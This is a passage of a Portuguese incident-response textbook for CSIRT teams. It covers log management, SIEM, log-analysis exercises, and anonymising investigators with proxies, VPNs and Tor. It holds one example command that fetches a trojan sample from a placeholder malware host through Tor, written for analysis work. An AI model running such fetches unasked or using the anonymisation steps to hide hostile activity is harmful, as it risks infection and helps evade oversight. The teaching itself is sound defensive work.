O Splunk atua como um centralizador de logs, no qual possvel concentrar dife-
rentes formatos de logs. O servio possui plug-ins que permitem processar logs
em formato Syslog e tambm logs do formato Windows unifcando as informaes
em uma base de dados prpria. Adicionalmente, o Splunk implementa mdulos
de anlise de logs, permitindo anlises grfcas, anlises forense (timeline) e ainda
alguns mdulos de anlise especfcos para dispositivos, tal como dispositivos CISCO.
Por fm, este captulo busca apresentar algumas ferramentas de anlise de logs e suas
caractersticas. No o objetivo aqui apresentar todas as ferramentas, nem tampouco apre-
sentar ferramentas especfcas de fabricantes. Deseja-se prover uma viso das principais
funcionalidades as quais um administrador de sistema pode demandar no seu processo de
anlise de logs.
SIEM
q Security Information and Event Management System (SIEM) uma ferramenta que
combina diferentes funcionalidades teis para facilitar o processo de coleta, correlao e
processamento de informaes de segurana.
Como caracterstica, a ferramenta SIEM possui uma base de dados unifcada, onde pos-
svel correlacionar eventos de segurana e prover alertas para um administrador.
q Sistemas de SIEM podem coletar os mais diversos eventos para anlise. Para isso, boa
parte dos SIEM utiliza agentes coletores que podem ser instalados nos diversos sis-
temas, tal como: equipamentos de rede, servidores, frewalls, antivrus e sistemas de
deteco de intruso. Os agentes coletam eventos e os encaminham para um servidor
central, o qual implementa tcnicas para identifcar anomalias.
Tais regras para anlise de anomalias podem utilizar regras simples com anlise estatstica ou
ainda heursticas desenvolvidas pelo prprio usurio. Em sistemas mais complexos, tipica-
mente solues comerciais, diferentes anlises podem ser utilizadas (grfcas, estatsticas
e inteligncia artifcial) e, como resultado de uma anlise, aes podem ser configuradas a
partir da interface de gerenciamento.
149

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
Aspectos de segurana
q A anlise dos arquivos de logs deve estar embasada na integridade das informaes arma-
zenadas. Existem muitas razes para que um sistema de log seja atacado. Obviamente,
a primeira delas evitar que as aes de um atacante sejam registradas e, em ltima
anlise, evitar que um comprometimento seja identifcado.
Em ataques mais sofsticados, entretanto, os atacantes utilizam tcnicas que podem alterar
informaes especfcas nas mensagens de logs ou ainda inserir informaes esprias de
modo a desorientar a investigao dos eventos.
Sendo assim, os ataques infraestrutura de logs devem ser considerados um fator crtico
para a segurana da instituio. Um atacante com acesso as informaes armazenadas
pode identifcar dados de servidores vulnerveis, nomes de usurios e possveis falhas de
segurana.
q De forma resumida, os ataques infraestrutura de logs podem ter diversas motivaes,
entre elas:
1 Destruir rastros de comprometimento;
1 Destruir informaes armazenadas;
1 Modifcar informaes presentes nos logs;
1 Obter informaes sensveis sobre a infraestrutura.
Tais ameaas devem ser observadas pelos administradores de rede. Cabe aos administra-
dores assegurar que as informaes de logs sejam ntegras, confdenciais e disponveis para
anlise. Diferentes mecanismos podem ser empregados para aprimorar a segurana da
infraestrutura de logs, entre eles: restringir o acesso ao sistema de arquivo, assegurar que
informaes logs trafegadas na rede no possam ser acessadas; determinar os sistemas que
podem registrar informaes de log no servidor centralizado.
q Alm de questes relativas segurana do sistema de logs em si, fundamental que os admi-
nistradores de sistemas atentem para os equvocos mais frequentes na gerncia de logs:
1 Ausncia de logs: pior que no analisar os logs de forma frequente no ativar os
sistemas de logs para registrar eventos. Todo sistema passvel de produzir logs deve
ser confgurado para exportar essas informaes para uma estrutura centralizada
ou mesmo para um arquivo localmente armazenado. Do contrrio, investigaes,
anlises e resoluo de problemas no podem contar com o auxlio dos logs;
1 No analisar os logs: no basta apenas coletar as informaes dos diferentes dis-
positivos e sistemas, importante ter alguma rotina manual ou automatizada para
analisar as informaes armazenadas nos arquivos de logs;
1 Armazenar informaes de log por um curto perodo de tempo: as informaes
presentes nos logs podem ser utilizadas para investigar incidentes de segurana pas-
sados e tambm para prever possveis anomalias em uma anlise temporal;
1 Priorizar os logs antes mesmo de serem coletados: os logs s podem ser priori-
zados depois de serem coletados pelos diversos aplicativos e sistemas. Priorizar logs
de certos dispositivos ou aplicaes apenas permite uma viso parcial dos eventos
desprezando possveis consequncias ou desdobramentos de uma ao registrada;
Detalhes tcnicos e
demais recursos para a
proteo da infraestru-
tura de logs fogem do
escopo deste captulo;
no entanto, mais
informaes podem ser
encontradas em:
Logging and Log
Management: The
Authoritative Guide to
Dealing with Syslog,
Audit Logs, Events,
Alerts and other IT.
d
150

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Ignorar logs de aplicaes: os logs dos sistemas so essenciais, mas nem sempre
podem mapear todas as aes. Registrar eventos de aplicaes uma tarefa funda-
mental para identifcar causas de problemas, como por exemplo, o motivo pelo qual
uma aplicao est consumindo todos os recursos de memria do sistema;
1 Buscar apenas por padres maliciosos conhecidos: a busca por padres conhe-
cidos nos logs vai apenas demonstrar dados de ataques j conhecidos e possivel-
mente j tratados pelas ferramentas de segurana disponveis na instituio. Como
alternativa, podem ser utilizadas a sumarizao de informao e a tcnica de igno-
rncia artifcial, ambas previamente descritas.
Recomendaes para sistemas de logs
Como visto no decorrer do captulo, essencial para um CSIRT conhecer os detalhes de um
sistema de armazenamento de logs onde notifcaes de sistemas e alertas de segurana so
registrados. Nem todos os CSIRTs so responsveis por desenvolver um sistema de logs para
uma instituio. No entanto, muitas vezes um CSIRT pode auxiliar na especifcao de um
sistema de logs, ou ainda sugerir melhorias para a equipe responsvel pela gerncia dos logs.
q Sendo assim, a seguir so listadas algumas recomendaes que podem ser teis no
gerenciamento dos logs.
1 Utilizar poucos arquivos de logs: embora seja possvel separar os logs em diferentes
arquivos por severidade, por aplicao, entre outros recomenda-se a utilizao
de poucos arquivos para armazenar as notifcaes. Segundo alguns autores, poucos
arquivos de logs facilitam etapas de gerenciamento e correlao de eventos;
1 Automatizar etapas: recomendvel ter um processo automatizado para sumari-
zao dos logs. Dessa forma, um processo de sumarizao de informaes imple-
mentado de forma peridica tende a auxiliar o gerenciado do grande volume de
informaes tratadas;
1 Evitar complexidade: nem sempre solues complexas de anlise de logs so
efetivas e fceis de serem gerenciadas. Por exemplo, solues de anlise de logs que
mesclam diferentes tcnicas, tal como regras dinmicas e identifcao de limiares
so complexas de serem gerenciadas e mantidas em um ambiente sempre crescente;
1 Centralizar os logs: centralizar as informaes dos diferentes sistemas permite que
os dados sejam correlacionados de forma transparente. Alm disso, a centralizao
dos logs enderea algumas questes de segurana, tal como armazenamento e
acesso s informaes de sistemas no acessveis localmente;
1 Implementar estrutura independente: um bom sistema de log tende a ser dissemi-
nado para todos os departamentos da instituio. Desenvolver e gerenciar uma infra-
estrutura de logs baseada em nico fabricante formato proprietrio pode tornar
invivel a adoo do sistema por outros departamentos. Formatos abertos so mais
fceis de confgurar e permitem adequar s caractersticas de ambientes heterogneos;
1 Obter ou receber logs instantaneamente: algumas mensagens de logs requerem
aes logo aps terem sido geradas. Em cenrios onde as mensagens so apenas obtidas
uma nica vez no dia, certas mensagens de logs podem ser observadas muito tarde;
1 Utilizar mesmo formato de hora: confgurar todos os sistemas para registrar os
eventos em horrio UTC considerado uma boa poltica. Nem sempre os sistemas
de logs registram o timestamp com o fuso horrio utilizado. Logo, usar um mesmo
fuso horrio facilita no processo de anlise de incidentes sem ter a necessidade de
verifcar se os sistemas esto no fuso horrio correto.
151

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
Leitura recomendada:
1 Nist 800-92 guide to computer security log management;
1 Logging and Log Management: The Authoritative Guide to Understanding the Concepts
Surrounding Logging and Log Management Anton A. Chuvakin;
1 UNIX and Linux System Administration Handbook (4th Edition);
1 RFC 5424: http://tools.ietf.org/html/rfc5424
Figura 7.9
Encaminhamento
de relatrios
152

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
153

C
a
p

t
u
l
o


7

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

7
Roteiro de atividades 7
Atividade 7.1 Syslog
O Syslog uma ferramenta utilizada por muitos sistemas e aplicaes para registrar
eventos. Infelizmente, a confgurao atual do Syslog no disponibiliza informaes com-
pletas do timestamp da mensagem. Descreva como confgurar o Syslog de maneira a com-
plementar as informaes de timestamp e inserir dados de fuso horrio (time zone).
Atividade 7.2 Infraestrutura de logs
Faa uma anlise da infraestrutura de log da sua instituio e aborde as seguintes questes:
a. Os logs so armazenados em uma estrutura centralizada?
b. Qual a poltica de armazenamento de logs? Por quanto tempo as informaes so arma-
zenadas? Quais tipos de logs? Qual a forma de armazenamento (DVD, fta etc.)?
c. No caso de utilizar NAT, como essas informaes so armazenadas no sistema de logs?
A porta de origem e a porta de destino dos acessos so armazenadas?
154

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
d. Os logs so analisados de forma automatizada? Que tipos de relatrio so utilizados?
Do ponto de vista gerencial, voc considera efciente a utilizao da tcnica de ignorncia
artifcial?
e. Descreva uma poltica de rotao de logs que seja mais adequada para o gerenciamento
da sua infraestrutura (rotao mensal ou diria, arquivamento automtico, formato da
hora, indexao).
f. Um servidor parou de armazenar localmente as mensagens de logs. Enumere possveis
motivos que levariam um servidor a parar de logar eventos do sistema. Como detectar
isso de forma automatizada?
g. Durante a investigao foi detectado que os logs no existem ou esto corrompidos?
Como lidar com isso internamente e externamente?
Atividade 7.3 Mensagens de logs
Identifque circulando as informaes que voc achar relevante (horrio, servio, servidor,
endereos) nos logs a seguir e faa uma pequena descrio do ocorrido:
a.
1. Jun 1 00:00:11 router.at.br1603306: Jun 1 00:00:10: %TCP-6-
BADAUTH: No MD5 digest from 10.10.143.253(179) to 10.10.143.1(44354)
(RST)
2. Jun 1 00:00:14 router.at.br1603307: Jun 1 00:00:13: %TCP-6-
BADAUTH: No MD5 digest from 10.10.143.253(64216) to 10.10.143.1(179)
155

C
a
p

t
u
l
o


7

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

7
3. Jun 1 00:00:17 router.at.br1603308: Jun 1 00:00:16: %TCP-6-BADAUTH:
No MD5 digest from 10.10.143.253(179) to 10.10.143.1(26679) (RST)
Descrio:
b.
1. Mar 20 12:19:12 syslog2 syslog-ng[35313]: I/O error occurred while
2. writing; fd=12, error=No buffer space available (55)
3. Mar 20 12:19:12 syslog2 syslog-ng[35313]: Connection broken;
4. time_reopen=60
Descrio:
c.
1. Apr 3 00:25:11 heman kernel: [12216.240091] device eth0 entered
promiscuous mode
2. Apr 3 01:25:12 heman kernel: [12217.507323] device eth0 left
promiscuous mode
Descrio:
d.
1. Apr 3 00:32:54 fuji kernel: [12679.516081] usb 2-4: new high
speed USB device number 3 using ehci_hcd
2. Apr 3 00:32:54 fuji NetworkManager[1844]: SCPlugin-Ifupdown:
devices added (path: /sys/devices/pci0000:00/0000:00:13.2/usb2/2-4/2-
4:1.0/net/wlan0, iface: wlan0)
3. Apr 3 00:32:54 fuji kernel: [12679.650334] Chip Version Info:
CHIP_8188E_Normal_Chip_TSMC_A_CUT_1T1R_RomVer(0)
4. Apr 3 00:32:57 fuji dhclient: DHCPREQUEST of 10.0.0.8 on wlan0 to
255.255.255.255 port 67 (xid=0x62019f89)
156

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Descrio:
e.
1. 10.10.10.10 galynych.com - [05/Apr/2014:01:58:55 +0400] POST /wp-
login.php HTTP/1.0 200 4220 - -
2. 10.10.10.10 galynych.com - [05/Apr/2014:01:58:56 +0400] POST /wp-
login.php HTTP/1.0 200 4220 - -
3. 10.10.10.10 galynych.com - [05/Apr/2014:01:58:57 +0400] POST /wp-
login.php HTTP/1.0 200 4220 - -
Descrio:
Atividade 7.4 Sumarizao de logs
Utilizando os comandos apresentados neste captulo para sumarizar as informaes de logs
dos seguintes arquivos (localizados na pasta logs-sessao-07 de seu computador):
access.log
iptables.log
157

C
a
p

t
u
l
o


7

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

7
Atividade 7.5 Anlise de logs
Analise os logs da sua mquina de maneira a responder as seguintes questes:
a. Qual foi o ltimo reincio da mquina? Em que arquivo essa informao est presente?
b. Localize o arquivo de confgurao do seu sistema syslog e identifque os diferentes tipos
de facility. Qual a facility utilizada para armazenar as mensagens de logs relativas ao
sistema (kernel)?
158

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
159

C
a
p

t
u
l
o


8

-

F
e
r
r
a
m
e
n
t
a
s

p
a
r
a

a
n

l
i
s
e

d
e

i
n
c
i
d
e
n
t
e
s

8
Ferramentas para anlise de
incidentes
Discutir cuidados necessrios para a efetiva investigao de incidentes de segurana;
Identifcar caractersticas de incidentes; Conhecer algumas ferramentas que podem
ser utilizadas na anlise de incidentes.
Anlise de arquivos binrios; Identifcao de caractersticas obtidas em
artefatos encontrados.



Introduo
q A anlise de incidentes busca identifcar mais informaes sobre as atividades relacio-
nadas com o incidente em si. Essa anlise pode revelar contribuies valiosas para a
resoluo do incidente provendo, de forma complementar, o entendimento das aes
realizadas pelo atacante. Resumidamente, a anlise de incidente busca:
1 Validar o incidente;
1 Obter mais informaes do incidente;
1 Determinar os vetores de ataque;
1 Determinar as vulnerabilidades do sistema;
1 Determinar o impacto tcnico e operacional;
1 Coordenar informaes adicionais com outras partes envolvidas.
Nem sempre todos os incidentes de segurana que chegam at a equipe podem ser investi-
gados de forma extensiva. A grande maioria das investigaes busca obter dados relevantes
dos incidentes de modo a solucionar uma falha de segurana explorada. No entanto, o CSIRT
pode ter polticas internas para especifcar que tipos de incidentes devem ser investigados
de forma mais detalhada, incluindo aspectos operacionais, e encaminhamento legal para os
eventos identifcados.
q Um processo de investigao de incidentes pode ter efeitos indesejados:
1 Buscar mais dados de um ataque pode resultar no eventual vazamento de informa-
es sobre o incidente, o que pode colocar a instituio em uma situao delicada;
1 Identifcar mais dados do incidente requerem tempo e recursos que, nem sempre,
esto disponveis para a instituio;
1 Elencar mais informaes do incidente pode ferir a poltica de segurana de uma instituio.
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
160

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Diversos mtodos podem ser empregados para coletar informaes detalhadas de
um incidente.
q Quando um incidente de segurana identifcado, por exemplo, a equipe do CSIRT tem
em mos um conjunto bsico de informaes que podem ser utilizadas como ponto de
partida de uma investigao:
1 Endereos IPs envolvidos;
1 Domnios de redes;
1 Aes suspeitas;
1 Servios abusados;
1 Protocolos utilizados;
1 Malwares;
1 Logs de eventos.
Alm de tais informaes sensveis previamente identifcadas nas etapas iniciais do inci-
dente, existem outras fontes que podem ser teis na composio do cenrio de investi-
gao. Para isso, importante que a equipe do CSIRT tenha conhecimento de ferramentas
bsicas para anlise de dados de incidentes, incluindo ferramentas de sistemas e servios
online disponibilizados gratuitamente na rede.
O objetivo deste captulo apresentar ferramentas e tcnicas com as quais os membros
de um CSIRT podem aplicar em uma anlise prvia e superfcial de incidentes de segu-
rana. Foge do escopo deste captulo realizar uma anlise forense de mquinas com-
prometidas e investigar arquivos maliciosos de maneira minuciosa. Sendo assim,
importante lembrar que a investigaes executadas diretamente em sistemas suspeitos
de comprometimento podem destruir evidncias, como: horrio de acesso de arquivos e
histrico de execuo dos comandos.
Por questes de organizao, este captulo incialmente discute preocupaes relativas
privacidade dos acessos de um CSIRT, sobretudo em etapas de investigao de incidentes.
Posteriormente, so descritas ferramentas que podem ser teis na investigao de arte-
fatos obtidos em mquinas infectadas. E, por fm, so apresentadas algumas listas de blo-
queio e base de dados com informaes de sistemas comprometidos que podem ser usados
para correlacionar informaes de eventos de segurana.
Preocupaes de privacidade
q Ao realizar uma tarefa de investigao de incidentes o CSIRT deve ter cuidados adicio-
nais evitando que suas atividades sejam mapeadas por terceiros. Do contrrio, as aes
realizadas pelo CSIRT podem ser seriamente prejudicadas. Algumas aes decorrentes
da identifcao dos acessos so:
1 Bloqueios de acesso;
1 Alvo de ataques;
1 Modo de operao.
Certas atividades realizadas pelo CSIRT podem ser facilmente mapeadas por terceiros. Em
especial, os acessos de rede realizados pelo CSIRT revelam dados de endereamento IP e
caractersticas operacionais, tal como Sistema Operacional, navegador web utilizado e perfl
de acesso a sites.
161

C
a
p

t
u
l
o


8

-

F
e
r
r
a
m
e
n
t
a
s

p
a
r
a

a
n

l
i
s
e

d
e

i
n
c
i
d
e
n
t
e
s

Em alguns casos, a identifcao do endereamento de rede do CSIRT pode acarretar em res-
tries de acessos a determinadas redes. Tem-se conhecimento de que alguns fraudadores
e atacantes bloqueiam determinados endereos de rede a fm de evitar a identifcao de
suas atividades. Por exemplo, um website com fraude pode no estar acessvel para o bloco
de endereamento CSIRT, mas sim para as demais redes.
Adicionalmente, o simples fato de saber que uma investigao est sendo conduzida pelo
time pode fazer com que um atacante altere suas tticas. Em casos mais raros, a identif-
cao pode levar com que os criminosos lancem represlias ao CSIRT como. por exemplo,
uma negao de servio distribudo para o IP identifcado.
De fato, a investigao de um incidente de segurana sempre deixar algum rastro. Por mais
cuidado que se tome, sempre existe a probabilidade de que algumas informaes sejam
mapeadas pelo alvo da investigao. Os acessos realizados pelo CSIRT podem tornar um
sistema facilmente rastrevel de maneiras nem sempre to bvias. Por exemplo, um nave-
gador web (browser) pode ser utilizado para identifcar um usurio ou investigador do CSIRT.
Quando um navegador acessa um site, um conjunto de informaes enviado para o ser-
vidor web destino. Esse conjunto de informaes corresponde a caractersticas muitas vezes
nicas de navegador, tal como: verso do navegador (user-agent), Sistema Operacional,
fontes. Os plug-ins (fash, java) tambm disponibilizam outro conjunto de dados que podem
ser utilizados para identifcar o browser. Existem alguns trabalhos na rea de privacidade
que investigam a entropia das informaes disponibilizadas pelo browser a fm de utiliz-la
para mapear as atividades.
Para isso, o Panopticlick analisa todas as informaes que o browser compartilha com os
sites visitados e correlaciona com informaes presentes na base de dados do prprio
servio. A fgura a seguir ilustra o resultado de um teste:
Um projeto denomi-
nado Panopticlick
desenvolveu um
website onde possvel
identifcar quo nico e
rastrevel um browser
testado: https://
panopticlick.ef.org/
w
Figura 8.1
Anlise da
rastreabilidade de
um browser.
162

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
No exemplo, compondo apenas as informaes que o browser forneceu para o site Panopticlick,
pode-se constatar que o browser testado pode ser unicamente identifcado em toda a base
de dados do projeto.
Alm do Panopticlick, existem outros projetos que buscam ilustrar apenas informaes de
cabealho que o browser fornece para uma aplicao. O site a seguir, por exemplo, discri-
mina todas as informaes disponibilizadas pelo browser: http://browserspy.dk/
J outros servios prometem identifcar se o acesso est sendo realizado atravs de um
servidor proxy: http://www.iprivacytools.com/proxy-checker-anonymity-test/
q Tais servios e tcnicas de identifcao so teis para conscientizao de usurios sobre
a privacidade.
No contexto de resposta a incidentes, esses servios podem auxiliar na identifcao de
possveis rastros pegadas digitais deixados pelos acessos realizados pela equipe.
importante notar que mesmo utilizando diferentes endereamentos IPs, o mapeamento
do browser vai identifcar que o acesso foi realizado do mesmo local.
Diante disso, a equipe do CSIRT deve primar por certo nvel de privacidade nas tarefas
desempenhadas.
q Existem alguns recursos que a equipe pode implementar para evitar que as suas ativi-
dades sejam identifcadas, como por exemplo:
1 Proxies;
1 Proxies web;
1 VPN;
1 Rede TOR.
Na sequncia so descritas as principais tcnicas utilizadas por CSIRT para evitar que suas
conexes e atividades sejam mapeadas por cibercriminosos.
Proxies
q Uma das maneiras mais populares para mascarar os acessos na rede atravs do uso de
servidores proxy.
Os proxies so sistemas que atuam como intermedirios para os acessos na rede. Para isso,
o proxy atua entre o cliente que faz a requisio por um servio e o servidor que responde
a requisio.
Boa parte das instituies utilizam servios de proxy para gerenciar as conexes dos usu-
rios permitindo o uso de Web-Cache, fltro de contedo e bloqueio de sites, muito embora o
proxy tambm possa ser utilizado por questes de privacidade. Afnal, quando se utiliza um
proxy, todas as requisies so primeiramente enviadas para o proxy e posteriormente para
o seu destino com endereamento do proxy, ou seja, com a origem mascarada.
q Algumas caractersticas dos proxies:
1 No existe privacidade entre o cliente e o proxy. O servidor proxy tem conhecimento
de todas as informaes do cliente que solicitou o acesso s informaes;
1 O endereamento do proxy pode ser facilmente mapeado; afnal, todas as conexes
realizadas iram ter como origem o endereo do prprio proxy;
163

C
a
p

t
u
l
o


8

-

F
e
r
r
a
m
e
n
t
a
s

p
a
r
a

a
n

l
i
s
e

d
e

i
n
c
i
d
e
n
t
e
s

q 1 Existem diferentes tipos de proxies. Diferentes proxies que suportam diferentes pro-
tocolos. Os principais protocolos suportados so:
2 HTTP: o protocolo para comunicao web. Um dos protocolos mais utilizados para
a comunicao com servidores proxy atuando apenas com requisies TCP;
2 SOCKS 4: um protocolo de comunicao intermedirio que suporta apenas
trfego TCP, no permitindo nenhuma forma de autenticao para acesso;
2 SOCKS 5: o protocolo SOCKS 5 a extenso do protocolo SOCKS 4. incorporado
suporte aos protocolos TCP e UDP e, tambm, a possibilidade de usar diferentes
mtodos de autenticao.
Web-Proxies
q
Os Web-Proxies so essencialmente proxies HTTP embutidos em uma interface web.
Dessa maneira, um usurio acessa um website especfco e insere o endereo da pgina web
que deseja acessar de forma annima. O Web-Proxy recebe como parmetro uma URL a ser
visitada e disponibiliza no prprio corpo da pgina o contedo visitado usando via Proxy,
como pode ser observado na fgura:
opes de acesso
A imagem ilustra o uso de um servio de Proxy-Web. Na parte superior, o usurio pode
defnir a URL do site a ser acessado pelo proxy e tambm alguns parmetros de acesso, tal
como bloqueio de cookies, bloqueio de scripts e outros.
Na referida consulta, foi requisitada a URL: http://wwww.whatismyip.com/ e o seu con-
tedo disponibilizado no corpo da pgina web. No corpo da mensagem disponibilizado o
contedo do acesso. Como curiosidade, a pgina requisitada www.whatismyip.com exibe
o IP de origem da requisio. Como pode ser visto, o IP de origem que representa o IP do
Web-Proxy 141.105.125.183 tendo como origem Holanda. Esse fato confrma que o acesso
foi realizado via proxy.
Naturalmente, a utilizao de Web-Proxies mais fcil. Do contrrio, o usurio deveria conf-
gurar um proxy HTTP nas prprias confguraes do seu navegador web. Existem diferentes
servios de Web-Proxy disponveis na rede. Boa parte dos servios gratuita; no entanto,
existem servios pagos que incorporam funcionalidades adicionais, assim como fltro de
contedo e proteo contra sites maliciosos. Exemplo de sites que podem ser utilizados
para navegao annima:
Figura 8.2
Acesso de um
website utilizando
o servio de proxy
goprivate.eu.
164

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
1 Anonymouse: http://anonymouse.org/
1 Cloack: https://incloak.com/
1 Goprive: http://goprivate.eu/
Cada servio independente e implementa suas prprias particularidades para acesso
annimo. O preceito bsico acessar o website usando o prprio endereo do servio,
ocultando o real IP que solicitou o servio. Mesmo ocultando o IP do solicitando, existem
servios que implementam diferentes nveis de anonimato, atuando no nvel do cabealho
do protocolo HTTP.
q O servio anonymouse, por exemplo, remove informaes do User-Agent e do tipo do
browser utilizado pelo usurio. Entretanto, o servio opta por inserir informaes que
sinalizam a utilizao do servio Web-Proxy, inserindo a string http://Anonymouse.org/
(Unix) no campo User-Agent do cabealho HTTP:
GET /index.html HTTP/1.1
Host: mail82.anonymouse.org
User-Agent: http://Anonymouse.org/ (Unix)
Connection: keep-alive
Essas informaes de cabealho geralmente no alteram a apresentao do website, mas
chegam at o servidor do site requisitado. Isso signifca que o servidor do website pode
identifcar que este foi requisitado via um servio de anonimizao.
Em outros servios, por exemplo, outras informaes so embutidas no cabealho da
requisio. No exemplo a seguir um determinado servio de Web-Proxy opta por manter as
informaes do User-Agent original do requisitante.
q No entanto, o servio insere o campo VIA informando o IP do proxy utilizado, como
pode ser visualizado a seguir.
GET /index.html HTTP/1.1
Host: notsohide.com
User-Agent: Mozilla/5.0 (X11; OpenBSD amd64) AppleWebKit/537.17
Connection: keep-alive
VIA: 200.X.X.X
As diferentes implementaes tornam alguns servios mais annimos que outros. O
conjunto de informaes providas pelos servios de Web-Proxies podem ser utilizados para
identifcar o prprio servio. Sendo assim, alguns servidores web maliciosos optam por no
responder requisies oriundas de servios de anonimizao ou, ainda, requisies com
certas diretivas presentes no cabealho HTTP. Cabe ao CSIRT avaliar o servio a ser utilizado
tendo em vista os diferentes aspectos de privacidade dos Web-Proxies.
A ttulo de curiosidade, existem websites que listam VPNs supostamente mais annimas, as
quais no armazenam informaes de logs. Dessa forma, ao lidar com incidentes onde tais
VPNs so utilizadas, o CSIRT certamente ter problemas de identifcao.
Saiba mais em http://
torrentfreak.com/
vpn-services-that-take-
-your-anonymity-
-seriously-2013-edition/
w
165

C
a
p

t
u
l
o


8

-

F
e
r
r
a
m
e
n
t
a
s

p
a
r
a

a
n

l
i
s
e

d
e

i
n
c
i
d
e
n
t
e
s

Virtual Private Network (VPN)
q De forma similar aos proxies, uma VPN permite que uma conexo seja estabelecida com
um servidor remoto permitindo que o trfego seja enviado atravs deste. A principal
diferena, com relao aos proxies, reside no fato de que toda transmisso ocorre de
forma criptografada.
Para isso uma conexo VPN cria uma espcie de um tnel seguro entre dois dispositivos de
rede utilizando uma autenticao compartilhada entre as duas extremidades do tnel.
Um CSIRT pode construir sua prpria infraestrutura de VPN. Para isso, pode ser contratado
um servidor remoto localizado em outros pas e atravs de um software especfco, tal como
OpenVPN, confgurar os seus dispositivos para acesso.
Por outro lado, tambm possvel encontrar servios de VPN especializados tendo como
foco a anonimizao do trfego. Alguns servios comerciais, por exemplo, permitem o
estabelecimento de um tnel encriptado com um pool de centenas de IPs rotativos. Dessa
maneira, a cada estabelecimento de sesso um novo IP de sada designado. Isso difculta o
rastreamento e o mapeamento das atividades do CSIRT. Exemplos de servios de VPN:
1 Private Internet Access: https://www.privateinternetaccess.com/
1 Privacy.io: https://privacy.io/
1 Viking VPN: http://vikingvpn.com/
1 IP Vanish: http://www.ipvanish.com/
Esses servios so muitos utilizados por CSIRT e tambm por usurios que residem em
pases com censura de contedo. Com isso, todas as conexes de um sistema so encami-
nhadas para o servidor remoto da VPN, tipicamente localizado em outro pas, a partir do
qual os acessos so efetivamente estabelecidos.
Rede Tor
q A rede Tor The Onion Router uma rede desenvolvida para prover anonimato aos
seus usurios que acessam a internet. O Tor gratuito e pode ser utilizado na maioria
dos Sistemas Operacionais. O funcionamento da rede consiste no roteamento no deter-
minstico das informaes entre os nodos da rede.
Os computadores dispersos pelo mundo que fazem parte da rede Tor so responsveis
por repassar o fuxo de informaes de forma criptografada a partir de um ponto inicial
at um dos milhares de nodos de sadas da rede.
Nesse nodo fnal, a requisio descriptografada e repassada o seu destino. Nodos de sada
so servidores especiais que so responsveis por encaminhar o trfego at o seu destino e
tambm ser o ponto de entrada para o trfego retornado. A rede Tor possui inmeros servi-
dores de sada; no entanto, a escolha destes realizada de forma no determinstica.
Quando uma requisio TOR solicitada, o servidor destino no sabe o seu IP originador,
mas sim o IP do nodo Tor de sada. Alm do mais, a rede TOR no tem como identifcar o IP
originador da requisio, pois o conhecimento est disseminado na rede. Cada nodo que
repassa as informaes sabe apenas parte do caminho realizado pelos dados. Os nodos no
sabem por que outros ndulos pelos quais a informaes trafegou.
166

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Uso da rede Tor na investigao de incidentes
q Como descrito, o Tor uma ferramenta gratuita e disponvel em diversas plataformas e
Sistemas Operacionais. Existe um conjunto de ferramentas que permitem acessar a rede
Tor para realizar as mais diferentes tarefas, tal como navegao web de forma annima,
download de malwares, acesso a servios IRC e outros.
Para anonimizar as atividades na web, temos basicamente duas opes: a) instalar a ferra-
menta tor e confgurar o seu browser para acessar a internet via SOCKS usando a porta
9050/TCP (localhost), porta padronizada para trfego de dados na rede TOR; b) utilizar o
software Tor Browser Bundle: https://www.torproject.org/projects/torbrowser.html
O Tor Browser Bundle um browser com todos os requisitos para navegar na rede
Tor autocontidos.
Ou seja, no necessita a instalao de nenhum recurso extra para acessar dados de
forma annima.
Alm do acesso via browser, possvel usar a rede Tor a partir da linha de comando. Isso
muito til em casos onde se necessita obter um malware da rede ou ainda acessar outros
protocolos. Uma dessas ferramentas o torproxy, que atua como SOCKS para a rede Tor:
https://code.google.com/p/torsocks/
Utilizando o torsocks possvel acessar aplicaes que permitem a utilizao de SOCKs
diretamente via rede TOR, como exemplifcado a seguir:
usewithtor [aplicao]
$ usewithtor wget http://site.malware/trojan.exe
Ou ainda:
$ usewithtor ssh root@server
Por fm, a rede Tor constitui mais uma alternativa para os CSIRT ocultarem suas atividades
da rede e evitar com que suas atividades sejam identifcadas por atacantes. Sabe-se no
entanto que existem algumas limitaes da rede incluindo o prprio desempenho da rede.
Devido s caractersticas intrnsecas do protocolo, uma srie de nodos intermedirios
utilizada no processo de roteamento inserindo uma latncia considervel no mesmo.
Figura 8.3
Notcia sobre
priso de usurio
da rede Tor.
167

C
a
p

t
u
l
o


8

-

F
e
r
r
a
m
e
n
t
a
s

p
a
r
a

a
n

l
i
s
e

d
e

i
n
c
i
d
e
n
t
e
s

Mecanismos de busca
A busca de informaes relativas a incidentes na web pode ser muito efetiva. Alm de
auxiliar na identifcao de detalhes de incidentes, os mecanismos de busca podem ser
teis para revelar o modus operandi do ataque e at mesmo os responsveis pelo ataque.
Assim como comentado anteriormente, recomenda-se zelar pela privacidade das informa-
es. O histrico de consulta e histrico de navegao pode revelar o perfl das atividades
desempenhas pela equipe do CSIRT. Logo, importante, ao realizar consultas a mecanismos
de busca, no estar associado a nenhuma conta, tal como a conta de usurio de servios
(Google, Yahoo! etc.).
